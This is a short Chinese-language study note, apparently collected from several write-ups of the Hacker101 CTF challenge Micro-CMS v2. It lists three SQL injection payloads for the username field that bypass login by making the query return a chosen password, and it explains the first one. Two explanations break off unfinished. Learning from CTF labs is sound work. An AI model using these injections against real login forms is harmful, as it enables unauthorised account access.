對帳號密碼欄位做 SQL injection

帳號密碼可以使用 SQL injection，以下藉由實際題目，加上各個網路解法來學習 SQL injection

Micro-CMS v2

• Hacker 101 CTF Write Up Part 1 — Micro-CMS v2, TempImage:
  username: ‘union all select 1#
  password: 1
  因為原本 SQL query 是 SELECT password FROM admins WHERE username=%s，它用前面的搜尋獲得密碼，但加上 ‘ 先讓前面的 query 結束，再來加上 union all select 1，# 只是 comment。
  所以整個搜尋變成 ‘SELECT password FROM admins WHERE username=’’’union all select 1#，這個搜尋最後會回傳 1，所以我們的密碼變成 1 了
• Hacker101 CTF — Micro-CMS v2:
  username: ‘ UNION SELECT ‘pass’ AS password FROM admins WHERE ‘1’ = ‘1
  password: pass
  這邊使用
• CTF — Hacker101 — Micro-CMS v2:
  username: username=admin’ UNION SELECT ‘PlayerX’ AS password FROM admins WHERE ‘1’ = ‘1
  password: PlayerX
  這邊使用